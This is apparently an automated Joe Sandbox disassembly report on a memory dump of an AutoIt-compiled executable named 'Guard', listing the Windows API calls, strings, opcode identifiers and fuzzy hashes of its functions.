                                                                      • Instruction ID: 5c1fafdb0c8d87f5305d2e94b0625f7ad6580deef411d66d5bf1844fc0e1e2df
                                                                      • Opcode Fuzzy Hash: 0c07ccfb34861574528b539fae33e7745fe9e8eda613376b717b55217b0e9792
                                                                      • Instruction Fuzzy Hash: 09316F350083859BC340EB64C895DEFB7A9BE97304F444A1DF5D1861D2DB38DA49C7AA
                                                                      APIs
                                                                        • Part of subcall function 006C3740: CharUpperBuffW.USER32(?,007771DC,00000000,?,00000000,007771DC,?,006B53A5,?,?,?,?), ref: 006C375D
                                                                      • _memmove.LIBCMT ref: 006BB68A
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper_memmove
                                                                      • String ID:
                                                                      • API String ID: 2819905725-0
                                                                      • Opcode ID: 0e1ee0530e55558b49f502f595136bdbee584d069a4bfbb0749f93f8988ca17d
                                                                      • Instruction ID: 1db03557352b3957d54c752a4a8f00b2665b6ad8726d8a0919eb7f78e8e9c277
                                                                      • Opcode Fuzzy Hash: 0e1ee0530e55558b49f502f595136bdbee584d069a4bfbb0749f93f8988ca17d
                                                                      • Instruction Fuzzy Hash: 1DA27DB05083519FD720DF18C480BAAB7E2FF85304F14995DE99A8B352DBB1ED86CB52
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,006FFC86), ref: 0071495A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0071496B
                                                                      • FindClose.KERNEL32(00000000), ref: 0071497B
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                      • String ID:
                                                                      • API String ID: 48322524-0
                                                                      • Opcode ID: 252f1fc558daf7ddd133f69688041273c072cfacad1ae561bc81900399f58985
                                                                      • Instruction ID: 37b69acaf537f63a080d1ebb61e79d2bbbc7097f09871c480d13315dbbf017cf
                                                                      • Opcode Fuzzy Hash: 252f1fc558daf7ddd133f69688041273c072cfacad1ae561bc81900399f58985
                                                                      • Instruction Fuzzy Hash: 1BE0D8354105099B4310673CEC0D4EE775CAE07339F104706FA35C10D0E778A98446D9

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 2660009612-1645009161
                                                                      • Opcode ID: a56990fa99544ca7b6a9f8a6f735dc1392ba9b9e7e51769d3f62529ec0eaaf05
                                                                      • Instruction ID: e2432b10cc56edc24a6aa6dcf0dc88145b1e214546cec0b2721f2ec59bac29f3
                                                                      • Opcode Fuzzy Hash: a56990fa99544ca7b6a9f8a6f735dc1392ba9b9e7e51769d3f62529ec0eaaf05
                                                                      • Instruction Fuzzy Hash: EEA1A070A4020ABBCB20AF21DC62FBE776AEF45740F14002DFD05AB392EBB19A55D755

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 006D0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,006C2A3E,?,00008000), ref: 006D0BA7
                                                                        • Part of subcall function 006D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006C2A58,?,00008000), ref: 006D02A4
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 006C2ADF
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 006C2C2C
                                                                        • Part of subcall function 006C3EBE: _wcscpy.LIBCMT ref: 006C3EF6
                                                                        • Part of subcall function 006D386D: _iswctype.LIBCMT ref: 006D3875
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      • API String ID: 537147316-3738523708
                                                                      • Opcode ID: 4ad1d3c05fe4877c4d899f8356ad3e45f9bd33fb7dd9167ecaffc9afe3573af7
                                                                      • Instruction ID: e16de6d9aedd546f73c901680f16ffe220a295b4462a6280894652910a87a8fd
                                                                      • Opcode Fuzzy Hash: 4ad1d3c05fe4877c4d899f8356ad3e45f9bd33fb7dd9167ecaffc9afe3573af7
                                                                      • Instruction Fuzzy Hash: 30027A705083419FC764EF24C851EAFBBE6EF89314F00491EF599972A2DB34DA49CB46

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      APIs
                                                                        • Part of subcall function 006D00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,006C3094), ref: 006D00ED
                                                                        • Part of subcall function 006D08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006C309F), ref: 006D08E3
                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006C30E2
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007001BA
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007001FB
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00700239
                                                                      • _wcscat.LIBCMT ref: 00700292
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 2673923337-2727554177
                                                                      • Opcode ID: 6faa10976c32697e1f1221afa0af0285d9f5828bf24ddc22ac37c0cd63f10b0d
                                                                      • Instruction ID: 454fa1561ce36854b2cc4b4ff80c4afec2743de535148ecc147ef9193ea75eb3
                                                                      • Opcode Fuzzy Hash: 6faa10976c32697e1f1221afa0af0285d9f5828bf24ddc22ac37c0cd63f10b0d
                                                                      • Instruction Fuzzy Hash: 1A71B1714453019EC380EF25DC59A6BBBE9FF46391F40452EF449872B2EF349984CB9A

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 006C4E22
                                                                      • KillTimer.USER32(?,00000001), ref: 006C4E4C
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006C4E6F
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006C4E7A
                                                                      • CreatePopupMenu.USER32 ref: 006C4E8E
                                                                      • PostQuitMessage.USER32(00000000), ref: 006C4EAF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: b16030dcbbc766634354a140868e0e76efefc5b10a543487c3abef764e2392c7
                                                                      • Instruction ID: ed322bf42b12aaec89772d30922f71e6e9233abcad45d929761ac134cc15c88c
                                                                      • Opcode Fuzzy Hash: b16030dcbbc766634354a140868e0e76efefc5b10a543487c3abef764e2392c7
                                                                      • Instruction Fuzzy Hash: 9C412771204609AADF199F24DC19FFA3697F748350F01422DFA06D12E2CF78AC91D7AA

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006D07EC
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 006D07F4
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006D07FF
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006D080A
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 006D0812
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 006D081A
                                                                        • Part of subcall function 006CFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,006BAC6B), ref: 006CFFA7
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006BAD08
                                                                      • OleInitialize.OLE32(00000000), ref: 006BAD85
                                                                      • CloseHandle.KERNEL32(00000000), ref: 006F2F56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: <ww$\tw$sw
                                                                      • API String ID: 1986988660-2988750673
                                                                      • Opcode ID: 45b2577c40e0bb6dacda3e9b863f9abe417daf7b06d92bcfd8d55104fa24e5c8
                                                                      • Instruction ID: af7e0f048c17909e4a7b26ae96b1ed1e5099fe4a64c10112b34919bdf309cad2
                                                                      • Opcode Fuzzy Hash: 45b2577c40e0bb6dacda3e9b863f9abe417daf7b06d92bcfd8d55104fa24e5c8
                                                                      • Instruction Fuzzy Hash: 498199B09093808EC79CDF69AD85A657EE5EB49384710C57E941CCB272EB7C4484CF99
                                                                      APIs
                                                                        • Part of subcall function 006D593C: __FF_MSGBANNER.LIBCMT ref: 006D5953
                                                                        • Part of subcall function 006D593C: __NMSG_WRITE.LIBCMT ref: 006D595A
                                                                        • Part of subcall function 006D593C: RtlAllocateHeap.NTDLL(00BD0000,00000000,00000001,?,00000004,?,?,006D1003,?), ref: 006D597F
                                                                      • std::exception::exception.LIBCMT ref: 006D101C
                                                                      • __CxxThrowException@8.LIBCMT ref: 006D1031
                                                                        • Part of subcall function 006D87CB: RaiseException.KERNEL32(?,?,?,0076CAF8,?,?,?,?,?,006D1036,?,0076CAF8,?,00000001), ref: 006D8820
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                      • String ID: `=t$h=t
                                                                      • API String ID: 3902256705-4135100045
                                                                      • Opcode ID: 9365f1385d8f60bd1e696b0bad9fc51d6a87f3de2ed2b121861b778aeec0eaf3
                                                                      • Instruction ID: 4e9e9d50b9d2d231bf563ac25e2ea5409f1cec233d2b2741a1b129e9c353dd78
                                                                      • Opcode Fuzzy Hash: 9365f1385d8f60bd1e696b0bad9fc51d6a87f3de2ed2b121861b778aeec0eaf3
                                                                      • Instruction Fuzzy Hash: CAF0A935E0461DB6DB20BB58EC159EE7BAD9F01310F10046BFD1896391DFB18B41C695
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0071416D
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0071417B
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0071419B
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00714245
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 420147892-0
                                                                      • Opcode ID: 82fe145c44dd26cce7a86b10457d6ed932da57566abe1540ff870998912998bb
                                                                      • Instruction ID: 88cd85556de6cb810988ac042c39148c76e70c4c49186c0aad383a3543ee0624
                                                                      • Opcode Fuzzy Hash: 82fe145c44dd26cce7a86b10457d6ed932da57566abe1540ff870998912998bb
                                                                      • Instruction Fuzzy Hash: 9631AD711083419FD300EF54D885FBEBBE9FF96350F00092EF581861A2EB749A89CB92
                                                                      APIs
                                                                        • Part of subcall function 006C49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006C27AF,?,00000001), ref: 006C49F4
                                                                      • _free.LIBCMT ref: 006FFB04
                                                                      • _free.LIBCMT ref: 006FFB4B
                                                                        • Part of subcall function 006C29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 006C2ADF
                                                                      Strings
                                                                      • Bad directive syntax error, xrefs: 006FFB33
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                      • String ID: Bad directive syntax error
                                                                      • API String ID: 2861923089-2118420937
                                                                      • Opcode ID: dfb232ef442a2dd6b82df40999ccf6f5000c9c2fea26b5828fd6e4747a6345f5
                                                                      • Instruction ID: cc9cddb45c32f11acc77aa1285d3c1cdf966595126eba6620bec7217d961d577
                                                                      • Opcode Fuzzy Hash: dfb232ef442a2dd6b82df40999ccf6f5000c9c2fea26b5828fd6e4747a6345f5
                                                                      • Instruction Fuzzy Hash: 90916B71900219EFCF14EFA4C891AFDB7B6FF09310B14452EE916AB2A1DB74AA05CB54
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: AU3! ?t$EA06
                                                                      • API String ID: 4104443479-24477217
                                                                      • Opcode ID: 3b0ac25f4614daa5dbe909d6b4a6ad77fcc0d595007aee6836fa9608ec3f472e
                                                                      • Instruction ID: 8a1f3991dc62da28c3454dcc38e2d6baf7f1b3732c4c8beeed91f0da44e6f6c1
                                                                      • Opcode Fuzzy Hash: 3b0ac25f4614daa5dbe909d6b4a6ad77fcc0d595007aee6836fa9608ec3f472e
                                                                      • Instruction Fuzzy Hash: 7A413A61E041689BDF21DB548861FFF7BA7DB45310F58816DE882E72C6DE348D8583E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d078509314504ded99ca0017d5b086404c8bd748071e1eeb4e31d232654f20ac
                                                                      • Instruction ID: 25572ddf5fbb43a2f3828c95a27e0ac642459c0b37dfdeeae3357bb78468e2a1
                                                                      • Opcode Fuzzy Hash: d078509314504ded99ca0017d5b086404c8bd748071e1eeb4e31d232654f20ac
                                                                      • Instruction Fuzzy Hash: 3BF18C7190021A9BCF14DF95C8A0EFEB7B6FF45300F54802EED16AB291DB399A41CB65
                                                                      APIs
                                                                      • _strcat.LIBCMT ref: 0072E20C
                                                                        • Part of subcall function 006B4D37: __itow.LIBCMT ref: 006B4D62
                                                                        • Part of subcall function 006B4D37: __swprintf.LIBCMT ref: 006B4DAC
                                                                      • _wcscpy.LIBCMT ref: 0072E29B
                                                                      Similarity
                                                                      • API ID: __itow__swprintf_strcat_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1012013722-0
                                                                      • Opcode ID: 1d6c2dfad7cc32c7f8a6e5bea0a611eefc0171f6c36d132b4efc8fc1a1dcbb8f
                                                                      • Instruction ID: 97ee55ff99050acbfb3a3b07f0ca5b1d9e045c3a8793c927b46a2c25012031df
                                                                      • Opcode Fuzzy Hash: 1d6c2dfad7cc32c7f8a6e5bea0a611eefc0171f6c36d132b4efc8fc1a1dcbb8f
                                                                      • Instruction Fuzzy Hash: B4915875A00614DFCB68EF18D4919A9B7E6FF49310B55805EE80A8F3A2DB34ED41CB84
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,006C3E72,?,?,?,00000000), ref: 006C4327
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,006C3E72,?,?,?,00000000), ref: 00700717
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 400851e27ff476e04e24c304b159edee6544afff732e7889b36a51e7c894db09
                                                                      • Instruction ID: 18e173ac770463129c10d8a0cbb915cf1a44690139f232ad73b13492821a30bb
                                                                      • Opcode Fuzzy Hash: 400851e27ff476e04e24c304b159edee6544afff732e7889b36a51e7c894db09
                                                                      • Instruction Fuzzy Hash: 3F019270244349BEF3204E25CC9AFB67ADDEB01768F10C319FAE86A1E0CBB55C468B54
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cd206fe5fed281e2aa72b8400bf1bc280b9df585042923e9d98d36868cf6d82b
                                                                      • Instruction ID: 4ba9a320c222048291cb7037a7454c5d640439136849e2be5ac1810f6b453cef
                                                                      • Opcode Fuzzy Hash: cd206fe5fed281e2aa72b8400bf1bc280b9df585042923e9d98d36868cf6d82b
                                                                      • Instruction Fuzzy Hash: E461BFB0600606DFDB10EF94C881AFAB7E6EF44300F15816DE9569B392EB74ED81DB51
                                                                      APIs
                                                                      • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 006C41B2
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 49be6cfc04066d9a1521f6c384f4fb691e46a1029a29eda20ee1b19ddc9cb165
                                                                      • Instruction ID: cc34ddecb6d676e66d62fe762f4891b4930bc9c971678391521c40d3bb890dc0
                                                                      • Opcode Fuzzy Hash: 49be6cfc04066d9a1521f6c384f4fb691e46a1029a29eda20ee1b19ddc9cb165
                                                                      • Instruction Fuzzy Hash: 75313D71A00615AFCB18DF68C894BBDB7B6FF54310F18862DE85593B10DB71A9A08B90
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 0fbc3058b6a3238e3ee95f775ce7053765bc72faa9761628bf13fd9e72fe5901
                                                                      • Instruction ID: e7c7c5b8edc72d89e11dfc2113d2b745aa8732b4402ca016bad4888f15604a69
                                                                      • Opcode Fuzzy Hash: 0fbc3058b6a3238e3ee95f775ce7053765bc72faa9761628bf13fd9e72fe5901
                                                                      • Instruction Fuzzy Hash: 2E4109B4504341DFDB14DF18C444B5ABBE2BF45304F0988ACF9899B362C776E885CB56
                                                                      APIs
                                                                        • Part of subcall function 006C4B29: FreeLibrary.KERNEL32(00000000,?), ref: 006C4B63
                                                                        • Part of subcall function 006D547B: __wfsopen.LIBCMT ref: 006D5486
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006C27AF,?,00000001), ref: 006C49F4
                                                                        • Part of subcall function 006C4ADE: FreeLibrary.KERNEL32(00000000), ref: 006C4B18
                                                                        • Part of subcall function 006C48B0: _memmove.LIBCMT ref: 006C48FA
                                                                      Similarity
                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                      • String ID:
                                                                      • API String ID: 1396898556-0
                                                                      • Opcode ID: 16e3dbbbae762520a2ad5dc104098ed8d72f4ab34863cbe3c58f1f6649f574fe
                                                                      • Instruction ID: d6cbd26607e4536e77a8462d98c57d9851eade234079468e65bb6158169f6f42
                                                                      • Opcode Fuzzy Hash: 16e3dbbbae762520a2ad5dc104098ed8d72f4ab34863cbe3c58f1f6649f574fe
                                                                      • Instruction Fuzzy Hash: FD11E731650205ABCB20FBB4CC2AFBE77AADF44711F10842DF545A61C5EF749E11A798
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 6b85d9d61af98bbdbc5905055ccc94418bc220a7ee4fb247ea65ada0a987c8f9
                                                                      • Instruction ID: baddfb81f63155602de2d2efcf5b27cdddf8b1a014effbd0371585c0bf7d62a2
                                                                      • Opcode Fuzzy Hash: 6b85d9d61af98bbdbc5905055ccc94418bc220a7ee4fb247ea65ada0a987c8f9
                                                                      • Instruction Fuzzy Hash: 432125B4908341DFDB54DF14C444B9ABBE2BF85304F05896CF98A5B322C735E889CB96
                                                                      APIs
                                                                      • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,006C3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 006C4276
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 29c394f74379dae1709780d072edaca47b5cd3eccec18c278fe192179e292a1d
                                                                      • Instruction ID: f0f23fb15626a132022d3bd5f0043e886003803eb265bd49333d97bf2ba05ae9
                                                                      • Opcode Fuzzy Hash: 29c394f74379dae1709780d072edaca47b5cd3eccec18c278fe192179e292a1d
                                                                      • Instruction Fuzzy Hash: 3C1128312007019FD330CF55C491FA6B7EAEF88710F14C92EE9AA86A50DB75EA45CB60
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
